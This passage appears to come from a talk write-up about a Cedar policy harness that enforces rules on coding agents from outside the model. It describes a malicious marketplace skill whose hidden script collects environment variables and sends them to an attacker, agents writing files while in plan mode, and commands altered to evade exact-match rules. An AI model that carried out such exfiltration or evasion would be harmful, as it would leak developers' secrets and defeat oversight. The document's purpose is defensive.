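    statements = [s.strip() for s in sql.split(";") if s.strip()]
    return [s for s in statements if _MUTATION.search(s) and not _WHERE.search(s)]

def build_context(command: str) -> dict:
    """Context attributes a forbid rule could test (attribute names are hypothetical)."""
    offending = unconstrained_mutations(command)
    return {
        "raw_command": command,
        "unconstrained_sql_mutation": bool(offending),
        "offending_statements": offending,
    }

print(build_context("DELETE FROM users")["unconstrained_sql_mutation"])
print(build_context("DELETE FROM users WHERE id = 1")["unconstrained_sql_mutation"])
```

Computing the attribute outside the policy keeps the Cedar rule itself simple: it only needs to test a boolean in `context`, and the offending statements can be returned to the agent as denial context.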
PoC 2: PII Taint Propagation Blocking a Web Fetch in Gemini CLI via Information Flow Control
Proof of Concept
- Establish the agent context with PII. The Gemini CLI agent is given a task that introduces highly confidential PII into its context: specifically a name, a date of birth, and a physical address. This PII enters the trajectory as part of an observation or control event.
- IFC classification via safety model. The Cedar harness intercepts the trajectory event containing the PII. Internally, the harness runs the GPT Safeguards 20B safety model against the event’s data payload. The safety model is given policy-provided examples of sensitivity label categories (e.g., “highly confidential,” “PII”) and classifies the data accordingly. The trajectory resource entity in the Cedar entity store is then tagged with the corresponding IFC sensitivity label.
- Taint propagates through the trajectory store. Because the harness maintains a stateful trajectory store (keyed by trajectory ID), the IFC label applied to the trajectory persists across subsequent turns of the agent loop. Any further agent actions operating within this same trajectory context inherit the tainted trajectory resource label.
- Agent attempts a web fetch. On a subsequent turn, Gemini CLI attempts to call a web fetch tool (e.g., fetching a URL from Google). This is modeled as a `web_fetch` action event in the trajectory event model. The local adapter intercepts this hook event and forwards it to the harness service.
- Cedar policy evaluation blocks the request. The Cedar policy engine evaluates the `web_fetch` action against the loaded policies. A Cedar policy checks the `trajectory` resource’s IFC label attribute. Because the trajectory is tainted with a highly confidential PII label, the policy forbids the `web_fetch` action for this trajectory. Cedar’s ABAC model allows this dynamic, context-sensitive decision without requiring pattern matching on the URL or command content.
- Block response returned to agent. The harness returns a deny decision to the local adapter, which surfaces the policy violation context back to the Gemini CLI agent. The web fetch fails. The agent receives the violation context, including the reason for the block (trajectory tainted with PII label), which it can use to steer its behavior, request user review, or halt the task.
- Key design properties demonstrated:
  - Stateful enforcement across turns: The taint is set once (when PII enters context) and persists, blocking downstream actions without re-evaluating the data on every turn.
  - Deterministic, out-of-model enforcement: The block is applied by the Cedar engine running outside the LLM, not by the model itself, making it tamperproof and not subject to prompt override.
  - IFC as a complement to permissions: A blanket permission granting the agent web access remains in place, but Cedar dynamically revokes it when the trajectory label indicates sensitive data is present, avoiding both consent fatigue and over-restriction.
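The taint propagation in this PoC can be sketched as a small label store plus a check at evaluation time. Everything here is illustrative: `TrajectoryStore`, `on_event`, and the `pii` label name are assumptions, and `classify` is a keyword stand-in for the safety model, not a real PII detector.

```python
from dataclasses import dataclass, field

@dataclass
class TrajectoryStore:
    """Hypothetical store: trajectory ID -> sensitivity labels seen so far."""
    labels: dict = field(default_factory=dict)

    def add_labels(self, trajectory_id: str, new: set) -> None:
        self.labels.setdefault(trajectory_id, set()).update(new)

    def get_labels(self, trajectory_id: str) -> set:
        return set(self.labels.get(trajectory_id, set()))

def classify(text: str) -> set:
    """Keyword stand-in for the safety-model classifier (illustration only)."""
    markers = ("date of birth", "home address")
    return {"pii"} if any(m in text.lower() for m in markers) else set()

# Actions revoked once the trajectory carries the "pii" label.
BLOCKED_WHEN_TAINTED = {"web_fetch"}

def on_event(store: TrajectoryStore, trajectory_id: str, action: str, payload: str = "") -> dict:
    # Label first, so a payload carrying PII taints the trajectory on this turn.
    store.add_labels(trajectory_id, classify(payload))
    labels = store.get_labels(trajectory_id)
    if action in BLOCKED_WHEN_TAINTED and "pii" in labels:
        return {"decision": "deny", "reason": "trajectory tainted with label: pii"}
    return {"decision": "allow", "reason": None}
```

A web fetch on a fresh trajectory is allowed, the same fetch after a PII-bearing observation is denied, and a different trajectory ID is unaffected, which matches the per-trajectory scoping described above.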
PoC 3: Lethal Trifecta Detection: Malicious Marketplace Skill Harvesting Environment Variables in Cursor
Proof of Concept
- Attacker stages the malicious skill. A skill is published to a public marketplace. Its advertised purpose is benign: generating code metrics to quantify “vibe coding” quality for the developer. The skill ships with a bundled Python script, `metrics.py`, that is not documented in the skill’s description.
- Developer installs the skill in Cursor. An unsuspecting developer installs the marketplace skill into their Cursor coding environment. Because the skill appears legitimate and useful, it is granted normal execution permissions within the agent’s tool scope.
- Lethal trifecta conditions are met:
  - Untrusted input (observation): The skill is fetched from a public marketplace and returned as an observation in the agent’s trajectory, so untrusted external content enters the agent context.
  - Sensitive data in context: The developer’s environment contains environment variables, which may include API keys, secrets, database credentials, or other sensitive configuration values.
  - Code execution channel (action): The agent has access to shell command execution, providing the mechanism for exfiltration.
- Agent triggers the malicious shell command. When the developer invokes the skill, Cursor’s agent executes a shell command that runs `metrics.py`. The script is designed to enumerate and collect environment variables from the host environment, then issue an outbound HTTP request to an attacker-controlled endpoint to transmit the harvested data.
- Cedar harness intercepts the shell command event. Cursor’s granular hook system fires a shell command hook at the moment the agent attempts to execute the `metrics.py` script. The local adapter intercepts the hook event over stdin, transforms it into a trajectory event model entry (action type: shell command execution), and forwards it to the local harness service.
- YARA signatures and guardrails analyze the script. Inside the harness service, the Cedar policy engine extracts the relevant entities and passes the `metrics.py` file content through the configured guardrails, specifically the YARA rule set. The YARA signatures identify patterns consistent with environment variable harvesting (e.g., iteration over `os.environ`) and outbound data exfiltration (e.g., `requests.post` with harvested data as the payload).
- Policy adjudication blocks the execution. The YARA match results are attached as attributes to the Cedar policy entities. A Cedar policy, authored to forbid shell command execution when the executed script matches environment-harvesting or exfiltration signature categories, evaluates to `DENY`. The harness returns a block decision to the Cursor hook, preventing `metrics.py` from running.
- Policy violation context is surfaced to the agent and user. The harness returns the block decision along with the policy violation context (the specific YARA signature categories matched, the nature of the detected behavior) back through the hook to the agent. This context is available for the agent to use for steering, or for direct review by the developer, making the threat transparent rather than silently suppressed.
- Attack is neutralized before exfiltration occurs. Because the Cedar policy harness operates deterministically outside the model, as a reference monitor that is always invoked, tamperproof, and verifiable, the malicious skill is blocked regardless of whether the agent’s prompt-level guardrails recognized the threat. The environment variables are never accessed or transmitted.
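The signature step can be illustrated without a YARA dependency by using plain regular expressions as stand-ins for YARA rules. This is a simplified sketch under that substitution: the category names, the patterns, and the `adjudicate_shell_command` function are assumptions for the example, and real YARA rules would be considerably richer.

```python
import re

# Regex stand-ins for YARA rules, grouped by signature category (illustrative only).
SIGNATURES = {
    "env_harvesting": [re.compile(r"\bos\.environ\b"), re.compile(r"\bos\.getenv\(")],
    "exfiltration": [re.compile(r"\brequests\.(post|put)\("),
                     re.compile(r"\burllib\.request\.urlopen\(")],
}

def scan(script_source: str) -> set:
    """Return the signature categories with at least one matching pattern."""
    return {
        category
        for category, patterns in SIGNATURES.items()
        if any(p.search(script_source) for p in patterns)
    }

def adjudicate_shell_command(command: str, script_source: str) -> dict:
    categories = scan(script_source)
    # Mirrors a forbid rule keyed on signature categories, not on the command text.
    blocked = {"env_harvesting", "exfiltration"} & categories
    return {
        "command": command,
        "decision": "deny" if blocked else "allow",
        "matched_categories": sorted(categories),
    }

malicious = "import os, requests\nrequests.post('https://attacker.invalid', json=dict(os.environ))\n"
print(adjudicate_shell_command("python metrics.py", malicious))
```

Note that the decision depends on what the script contains, not on the shell command string, so renaming `metrics.py` or changing how it is invoked does not change the outcome.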
PoC 4: Claude Code Plan Mode Policy Bypass: Blocking File Writes Outside the Plan File
Proof of Concept
- Trigger condition: agent enters plan mode. Claude Code is invoked with `permission_mode` set to `plan`. In plan mode, the intended behavior is that the agent only produces a plan artifact (the plan file) and does not mutate the environment. However, Claude Code does not natively enforce this restriction at the execution layer.
- Bypass behavior: file write outside the plan file. Despite operating in plan mode, the agent issues a `write_file` action targeting an arbitrary path (e.g., `src/malicious_payload.py`). Without a policy enforcement layer, this action proceeds normally and the file is written to disk. This is the policy bypass: plan mode is a behavioral hint communicated through the prompt and permission context, not a hard execution boundary.
- Cedar policy definition: intercept the write action. A Cedar policy is authored to address this gap. The policy checks two conditions on every `write_file` action event:
  - `context.permission_mode == "plan"`: the agent is operating in plan mode
  - `resource.path != context.plan_file_path`: the target file is not the designated plan file

  When both conditions are true, the `forbid` policy matches, blocking the write before it reaches the filesystem.

  ```cedar
  forbid (
    principal,
    action == Action::"write_file",
    resource
  ) when {
    context.permission_mode == "plan" &&
    resource.path != context.plan_file_path
  };
  ```
- Hook wiring: Cedar harness intercepts the trajectory event. The local adapter sitting between Claude Code and the environment intercepts the `write_file` action event before execution. It transforms the event into a trajectory event model entry, enriching it with `permission_mode` from the Claude Code session context and `plan_file_path` from the harness configuration. This enriched event is forwarded to the Cedar policy engine.
- Policy adjudication: deny decision returned. The Cedar policy engine evaluates the enriched event against the policy set. Because `permission_mode == "plan"` and the target path is not the plan file, the `forbid` policy matches and the engine returns a deny decision. The harness receives the result and blocks the write action from completing.
- Agent feedback: policy violation surfaced. The harness returns a policy violation context back to the agent loop. Claude Code receives the blocked action result as an observation event. The agent can use this feedback to steer its behavior (revert to producing only the plan artifact), or the violation can be surfaced to the user for review.
- Why this matters: deterministic enforcement outside the model. Claude Code’s hook support is limited compared to Gemini CLI or Cursor: it does not expose before/after model hooks, only a final agent response notification event. However, the file write action itself can still be intercepted at the adapter layer. The Cedar policy closes the plan mode bypass without relying on the model to self-enforce the restriction, which it demonstrably does not do by default. This is a concrete example of policies that govern agent behavior rather than security threats: Cedar policies are not limited to blocking attacks; they can enforce operational constraints as well.
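The enrichment step and the two policy conditions can be mirrored in Python to make the data flow concrete. This is a sketch under assumptions: the `enrich` and `plan_mode_forbids` names are hypothetical, and the path normalization is an addition for the example (so that `./plans/plan.md` and `plans/plan.md` compare equal), not something the source describes.

```python
import posixpath

def enrich(event: dict, permission_mode: str, plan_file_path: str) -> dict:
    """Adapter-side enrichment: add permission_mode and plan_file_path to the context."""
    return {
        "action": event["action"],
        # Normalizing both paths is an assumption made for this sketch.
        "resource": {"path": posixpath.normpath(event["path"])},
        "context": {
            "permission_mode": permission_mode,
            "plan_file_path": posixpath.normpath(plan_file_path),
        },
    }

def plan_mode_forbids(request: dict) -> bool:
    """Python mirror of the forbid rule's scope and conditions."""
    ctx = request["context"]
    return (
        request["action"] == "write_file"
        and ctx["permission_mode"] == "plan"
        and request["resource"]["path"] != ctx["plan_file_path"]
    )

request = enrich({"action": "write_file", "path": "src/malicious_payload.py"},
                 permission_mode="plan", plan_file_path="plans/plan.md")
print(plan_mode_forbids(request))
```

The policy itself never inspects the file contents or the prompt. It only compares attributes that the adapter supplied, so its correctness depends on the adapter reporting `permission_mode` and the target path faithfully.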
Actionable Takeaways
- Deploy local adapters as the hook-facing interface for each coding agent you need to cover, normalizing their divergent hook APIs into a single trajectory event model before policy evaluation — this is what makes it possible to maintain one policy set across Gemini CLI, Claude Code, and Cursor simultaneously.
- Use Cedar's formal analysis tooling (contradiction detection, vacuous rule checking) via the policy agent's MCP interface before deploying any new policy to production — Cedar's symbolic analysis catches logical errors that testing alone will miss, such as policies that can never fire or policies that silently override each other.
- Implement information flow control labels on the trajectory entity store from day one, even if your initial policies don't use them yet — retrofitting taint tracking into a running harness is significantly harder than adding IFC-based policy conditions to an already-labeled trajectory stream.
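The adapter normalization described in the first takeaway might look like the sketch below. The two raw payload shapes are invented for illustration and do not correspond to any real agent's hook format; `agent_a`, `agent_b`, and all field names are placeholders, and each agent's hook documentation should be consulted for the actual fields.

```python
import json
from dataclasses import dataclass, asdict

@dataclass
class TrajectoryEvent:
    agent: str
    trajectory_id: str
    kind: str       # "action", "observation", "control", or "state"
    action: str
    payload: dict

def _from_tool_call(agent: str, raw: dict) -> TrajectoryEvent:
    # Hypothetical shape: {"session": ..., "tool": ..., "args": {...}}
    return TrajectoryEvent(agent, raw["session"], "action", raw["tool"], raw.get("args", {}))

def _from_command(agent: str, raw: dict) -> TrajectoryEvent:
    # Hypothetical shape: {"conversation_id": ..., "command": "..."}
    return TrajectoryEvent(agent, raw["conversation_id"], "action",
                           "shell_command", {"command": raw["command"]})

# One normalizer per agent; the policy set only ever sees TrajectoryEvent.
NORMALIZERS = {"agent_a": _from_tool_call, "agent_b": _from_command}

def normalize(agent: str, raw_json: str) -> dict:
    """Turn an agent-specific hook payload into the shared event model."""
    event = NORMALIZERS[agent](agent, json.loads(raw_json))
    return asdict(event)

print(normalize("agent_b", json.dumps({"conversation_id": "c9", "command": "ls"})))
```

Adding coverage for another agent then means writing one more normalizer, while the policies stay unchanged.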
Common Pitfalls
- Treating the Cedar harness as a replacement for sandboxes or coding agent permission systems rather than a complement to them. The speaker explicitly positions this as defense in depth: Cedar provides expressive, context-aware policies, but permission systems handle consent flows and sandboxes handle process isolation. Removing other layers because Cedar is in place leaves gaps Cedar was not designed to fill.
- Writing policies that rely on brittle pattern matching — for example, maintaining a hardcoded list of "destructive commands" as string patterns in Cedar policies. This approach invites policy hacking (an attacker who knows your pattern list can craft commands that evade it) and creates a maintenance burden as command surfaces evolve. The recommended approach is attribute-based conditions (IFC labels, YARA category matches, permission mode attributes) that reason about intent and context rather than exact command strings.
Policy Scalability, Goldilocks Calibration, and Future Directions
The Goldilocks Problem: Calibrating Cedar Policies for Agent Utility and Security
Deploying Cedar policies in a coding agent harness is not a fire-and-forget operation. There is an inherent tension in policy design that the team calls the Goldilocks policy zone: policies must be tight enough to block real threats but loose enough to preserve agent utility.
Two failure modes bracket this zone:
- Overly restrictive policies: Rules that are too broad will block legitimate agent actions, degrading the productivity benefit that motivated deploying an AI coding assistant in the first place. If an agent cannot execute the shell commands it needs to run tests or build artifacts, the policy has become an obstacle rather than a safeguard.
- Brittle pattern matching: At the other extreme, policies built around rigid signature matching on specific destructive command strings (e.g., blocking only `rm -rf /` literally) are fragile. Adversarial content, whether from a malicious marketplace skill or a prompt injection, can trivially mutate commands to slip past exact-match rules. This is policy hacking, and it is an active research concern for the team.
The implication for security engineers is that policy calibration is an ongoing, context-dependent process. Policies that work for a security-hardened CI pipeline may be too restrictive for a developer’s local coding environment. The harness is designed to be bring-your-own-context, but that flexibility places the calibration burden on the operator.
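The brittleness of exact-match rules is easy to demonstrate. In the sketch below, `exact_match_blocks` models a literal blocklist, while `attribute_based_blocks` derives two attributes (is the deletion recursive, does it target the root) before deciding. Both functions are hypothetical illustrations, and the second is still incomplete: it only understands `rm`, so other destructive commands would pass it.

```python
import shlex

BLOCKLIST = {"rm -rf /"}

def exact_match_blocks(command: str) -> bool:
    """Literal string comparison against a fixed blocklist."""
    return command in BLOCKLIST

def attribute_based_blocks(command: str) -> bool:
    """Derive attributes from the parsed command instead of comparing strings."""
    tokens = shlex.split(command)
    if not tokens or tokens[0] != "rm":
        return False
    args = tokens[1:]
    short_flags = "".join(t[1:] for t in args if t.startswith("-") and not t.startswith("--"))
    long_flags = {t for t in args if t.startswith("--")}
    recursive = "r" in short_flags or "R" in short_flags or "--recursive" in long_flags
    targets = [t for t in args if not t.startswith("-")]
    return recursive and "/" in targets

for cmd in ["rm -rf /", "rm -r -f /", "rm  -fr  /"]:
    print(repr(cmd), exact_match_blocks(cmd), attribute_based_blocks(cmd))
```

Only the first variant is caught by the literal rule, while all three share the same derived attributes. This is the motivation for expressing policies over attributes and labels, with the caveat that any single-command parser like this one remains a narrow defense.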
Scaling Policy Authorship with Agent-Assisted Generation
Writing Cedar policies by hand is tedious. Cedar’s syntax, while precise, requires familiarity with its entity-attribute model, schema definitions, and the specific event types exposed by the trajectory model. For teams that want to cover a broad set of threat patterns, manual policy authorship does not scale.
The solution the team has implemented is a policy agent — an LLM-powered assistant that uses Cedar’s formal tooling over MCP to help operators author and validate policies. The policy agent:
- Has access to the available entity schemas and context types via an MCP skill
- Fetches the sensitivity labels, YARA signature categories, and information flow control categories from the policy model
- Accepts natural-language descriptions of desired policy behaviors (e.g., “block shell injection patterns”) and generates Cedar policy syntax
- Uses Cedar’s built-in formal analysis tools to verify the generated policies for contradictions, vacuous rules, and shadowed subsets before deployment
This approach turns Cedar’s formal analyzability — normally an advantage for static verification — into a practical authoring accelerator. Because Cedar policies can be mechanically checked for correctness, LLM-generated policies are not just guesses; they can be validated against the schema and confirmed free of logical defects before being deployed into the harness.
Stateful Multi-Turn Policies and the Limits of the Current Architecture
Cedar is inherently stateless: each policy evaluation is an independent decision over the current event’s attributes and entity state. The trajectory store and entity store in the harness provide a workaround — by persisting bookkeeping about observed entities and trajectory labels, the system can expose derived attributes (like taint flags) to Cedar at evaluation time, enabling behavior that appears stateful.
However, the team is candid about the limits of this approach. True multi-turn policy logic — reasoning about sequences of events, temporal ordering, or conditions that only become relevant after a specific chain of actions — is not natively supported by Cedar. Temporal linear logic and related formal systems are more expressive foundations for this class of policy, though these remain future directions rather than implemented features.
The multi-agent boundary problem is also explicitly out of scope for the current implementation. The harness focuses on single-agent trajectories. While the control event type provides visibility into sub-agent spawning and agent-to-agent orchestration events, policies that enforce contextual integrity across agent boundaries — preventing one agent from leaking a secret it learned to another agent in the environment — are not yet addressed. This is acknowledged as a meaningful gap for teams operating multi-agent pipelines.
Guardrail Latency and Benchmarking
Every hook interception adds latency to the agent loop. The harness must evaluate Cedar policies, run YARA signatures, and optionally invoke the GPT Safeguards classification model for IFC labels — all synchronously in the hot path of agent execution.
The team has ongoing research into guardrail latency benchmarking: measuring the overhead introduced by each component of the harness and identifying where optimizations are needed to keep the enforcement layer from becoming the bottleneck. This is particularly relevant for before-model hooks in Gemini CLI, where token-level streaming interception can compound latency across a long generation.
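A per-stage latency measurement of the kind described could start from something like the following. It is a generic timing sketch, not the team's benchmark: the `time_stage` and `benchmark` helpers are hypothetical, and the two stages passed in the usage example are trivial placeholders standing in for policy evaluation and signature scanning.

```python
import time
from statistics import median

def time_stage(fn, payload, runs: int = 50) -> float:
    """Median wall-clock milliseconds for one guardrail stage."""
    samples = []
    for _ in range(runs):
        start = time.perf_counter()
        fn(payload)
        samples.append((time.perf_counter() - start) * 1000.0)
    return median(samples)

def benchmark(stages: dict, payload, runs: int = 50) -> dict:
    """Time each stage independently and report the summed overhead."""
    per_stage = {name: time_stage(fn, payload, runs) for name, fn in stages.items()}
    return {"stages": per_stage, "total_ms": sum(per_stage.values())}

# Placeholder stages; real ones would call the policy engine and the scanners.
report = benchmark(
    {"policy_eval": lambda p: len(p), "signature_scan": lambda p: p.count("os.environ")},
    payload="x" * 10_000,
    runs=20,
)
print(sorted(report["stages"]))
```

Using the median rather than the mean keeps a single slow run (for example, a cold model invocation) from dominating the result, though tail latency would also be worth tracking for a component in the hot path.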
Complementarity with Existing Defense Layers
The harness is not a replacement for existing security controls — it is an additive layer. Maisel explicitly positioned it as complementary to:
- Permission systems (e.g., Claude Code’s native bash permission controls) — Cedar can add context-aware conditions that permission systems cannot express, such as allowing a command only when the trajectory is not tainted with a PII label
- Sandbox systems — Sandboxes may be overly restrictive for development workflows; Cedar policies allow finer-grained allow/deny decisions without the all-or-nothing constraint of a sandbox boundary
- Prompt-level guardrails — Unlike instructions in a system prompt, Cedar policies run outside the model and cannot be circumvented by adversarial content in the agent’s context
The open-source release includes both the hook-integrated Cedar policy engine for CLI coding agents (Gemini CLI, Claude Code, Cursor) and a Python library for first-party agent frameworks (LangChain[9], Strands, ADK), making the complementarity practical across both workflow and embedded agent deployment patterns.
Actionable Takeaways
- Treat policy calibration as an iterative process, not a one-time deployment step. Start with a minimal policy set targeting your highest-priority threat patterns (e.g., exfiltration channels, destructive commands), measure the impact on agent utility, and expand coverage incrementally. Use Cedar's formal analysis tools to verify each new policy for contradictions and vacuous rules before it goes into production.
- Use the policy agent over MCP to accelerate Cedar policy authorship at scale. Rather than writing Cedar syntax by hand for every new threat pattern, describe the desired behavior in natural language, let the policy agent generate the Cedar syntax, and validate it programmatically before deployment. For large threat surfaces, this makes broad policy coverage far more tractable than manual authorship.
- Layer the Cedar harness on top of existing controls rather than replacing them. Keep native permission systems and sandbox boundaries in place; use Cedar to add context-aware conditions (taint labels, trajectory state) that those systems cannot express. This defense-in-depth posture ensures that a gap in one layer does not create a single point of failure.
Common Pitfalls
- Building policies around exact-match string patterns for destructive commands is brittle and exploitable. Attackers and malicious content can trivially mutate command strings to evade rigid pattern matching. Policies should be expressed in terms of entity attributes, sensitivity labels, and trajectory context — not literal string equality — to avoid creating a bypassable allowlist that invites policy hacking.
- Treating Cedar's stateful bookkeeping workaround (entity and trajectory stores) as equivalent to native multi-turn policy logic overstates its capabilities. The entity and trajectory stores expose derived attributes at evaluation time, but they cannot express temporal ordering constraints or event-sequence reasoning natively. Teams building policies that depend on complex causal chains across many turns should evaluate whether temporal linear logic or an alternative formal system is needed rather than stretching Cedar beyond its designed scope.
Conclusion
Matt Maisel’s Cedar policy harness addresses the core gap in coding agent security: prompt-level guardrails operate inside the model’s trust boundary and can be circumvented, while sandboxes and permission systems lack the trajectory context to enforce intent-based restrictions. By modeling the agent’s runtime as a four-event trajectory stream, positioning Cedar as a formally verifiable reference monitor outside the model, and wiring it into the available hook surfaces of Gemini CLI, Claude Code, and Cursor, the harness provides deterministic, attribute-enriched enforcement that none of the existing layers deliver on their own.
The four proof-of-concept demonstrations — from blocking an unconstrained SQL delete to detecting a malicious marketplace skill through YARA signatures — show that the approach works across different agents, different threat patterns, and different policy types, from operational constraints (plan mode file write enforcement) to active attack detection (lethal trifecta). The open challenges — Goldilocks calibration, guardrail latency, multi-turn stateful logic, and multi-agent boundaries — are real, but they represent a known research roadmap rather than fundamental limitations.
For security engineers securing AI development environments, the starting point is the trajectory event model itself: map your agent’s actions to the four event types, identify which hooks are available, and build your Cedar policy coverage from the highest-risk enforcement points outward.
References & Tools
1. OWASP Top 10 for Agentic Applications: OWASP risk framework for large language model and agentic application security.
2. Gemini CLI: Google's open-source coding agent with before/after model hooks and token-level streaming for policy interception.
3. Claude Code: Anthropic's CLI coding agent; exposes a final agent response notification event as its primary hook surface.
4. Cursor: AI coding environment providing granular hook types for MCP tool calls, shell commands, and generic tool calls.
5. Cedar Policy Language: Formally analyzable policy language with ABAC support and symbolic contradiction/vacuous-rule detection.
6. Model Context Protocol (MCP): Open protocol for exposing tools and context to LLM agents; used here for policy agent access to Cedar tooling and for Cursor's tool call hooks.
7. GPT Safeguards 20B Model: Safety model used for information flow control classification, labeling trajectory event data with sensitivity categories based on policy-provided examples.
8. YARA Rules: Signature-based detection framework for identifying malicious patterns in files and command strings; integrated as a guardrail in the Cedar harness.
9. LangChain: Python agent framework for which an open-source Cedar policy engine library is available, enabling embedded policy enforcement within framework-based agents.